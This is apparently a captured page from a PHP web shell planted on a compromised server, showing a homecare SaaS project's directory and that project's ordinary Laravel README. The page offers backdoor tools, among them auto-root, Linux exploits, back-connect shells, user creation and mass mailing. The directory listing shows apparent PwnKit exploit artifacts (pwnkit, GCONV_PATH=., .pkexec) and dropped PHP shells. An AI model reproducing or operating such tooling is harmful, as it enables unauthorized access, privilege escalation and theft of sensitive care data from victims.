Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
homecareus.io /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxrwxrwx
.claude
[ DIR ]
drwxrwxrwx
.git
[ DIR ]
drwxrwxrwx
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
bspjthi
[ DIR ]
drwxr-xr-x
ckwyxli
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxrwxrwx
evtjano
[ DIR ]
drwxr-xr-x
ezmonph
[ DIR ]
drwxr-xr-x
gpdqxlb
[ DIR ]
drwxr-xr-x
hcylkzp
[ DIR ]
drwxr-xr-x
homecare-saas
[ DIR ]
drwxr-x---
homecare-saas-next
[ DIR ]
drwxr-x---
jdqmsea
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxrwxrwx
routes
[ DIR ]
drwxrwxrwx
zfrycve
[ DIR ]
drwxr-xr-x
.env.example
597
B
-rw-rw-rw-
.htaccess
129
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
222.php
15.76
KB
-rw-r--r--
README.md
3.63
KB
-rw-rw-rw-
composer.json
991
B
-rw-rw-rw-
cutover.sh
2.36
KB
-rwxr-xr-x
def.html
263
B
-rw-r--r--
filefuns.php
5.86
KB
-r--r--r--
goat1.php
143.87
KB
-rw-r--r--
googleaf9cd7197c8a84d8.html
53
B
-rw-r--r--
package.json
745
B
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
random.php
52.18
KB
-rw-r--r--
unzipper.php
11.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# Homecare EVV SaaS Laravel 11 Scaffold Production-oriented starter scaffold for a multi-tenant homecare SaaS inspired by the functional areas in the provided screenshots: clients, caregivers, schedules, EVV calls, GPS map verification, messages/alerts, reports, and admin settings. This is an architecture overlay for a fresh Laravel 11 application. Create the Laravel app, then copy or keep these files in place and install the listed packages. ## Stack - Laravel 11, PHP 8.3+ - Inertia.js, React, TypeScript - Tailwind CSS, shadcn/ui, lucide-react - stancl/tenancy for domain/subdomain tenancy - Laravel Cashier for Stripe billing - spatie/laravel-permission for RBAC - Laravel Reverb for real-time GPS/EVV updates ## Install Sequence ```bash composer create-project laravel/laravel homecare-saas "^11.0" cd homecare-saas composer require inertiajs/inertia-laravel laravel/cashier laravel/reverb stancl/tenancy spatie/laravel-permission tightenco/ziggy composer require laravel/breeze --dev php artisan breeze:install react --typescript php artisan install:broadcasting php artisan tenancy:install php artisan vendor:publish --tag="cashier-migrations" npm install lucide-react class-variance-authority clsx tailwind-merge @radix-ui/react-slot ``` Then merge this scaffold into the generated app and run: ```bash php artisan migrate php artisan tenants:migrate php artisan db:seed --class=RolePermissionSeeder ``` The scaffold includes tenant-side Spatie-compatible permission tables in `database/migrations/tenant`; do not also run the default Spatie migration centrally unless you want central-office roles too. ## Folder Structure ```text app/ Enums/RoleName.php Events/CaregiverLocationUpdated.php Http/ Controllers/Billing/* Controllers/Tenant/* Middleware/BindTenantContext.php Middleware/EnsureTenantIsSubscribed.php Models/ Concerns/BelongsToTenant.php Caregiver.php Client.php EvvLog.php GpsBreadcrumb.php Schedule.php SubscriptionPlan.php Tenant.php User.php Policies/* Providers/AuthServiceProvider.php bootstrap/ app.php providers.php config/ tenancy.php database/ migrations/* central migrations migrations/tenant/* tenant migrations seeders/RolePermissionSeeder.php routes/ web.php tenant.php api.php channels.php resources/js/ Layouts/AuthenticatedLayout.tsx Pages/Billing/Plans.tsx Pages/Tenant/Dashboard/Dispatch.tsx ``` ## Domain Model - Central app: `app.yourdomain.com`, `admin.yourdomain.com` - Tenant app: `{agency}.yourdomain.com` - Each tenant has one or more `domains` rows, so custom domains can be added later. - Stripe customer and subscription records live on the central `tenants` table. - Operational PHI-like data lives in tenant databases when multi-database mode is enabled. ## Functional Modules From Screenshots - Home dashboard: actionable module launcher and alert counts. - Clients: client master list, payors, physicians, referral sources, wellness questions. - Caregivers: credentialing, applicant list, notes, payroll fields, reminders. - Schedule: day/week/month/grid views and schedule matching. - Timesheets: create/edit/maintain weeks and invoicing exports. - EVV: schedules, calls, alert log, audit trail, messaging, GPS map verification. - Admin: company settings, security, EVV defaults, audit logs, notifications. ## Operational Notes - Use HTTPS-only cookies and HSTS in production. - Queue broadcasts and Stripe webhook work. - Put Reverb behind a process manager. - Encrypt or minimize sensitive EVV metadata where regulation or customer contract requires it. - Add audit tables for schedule edits, EVV exception resolution, and user access before launch.
Close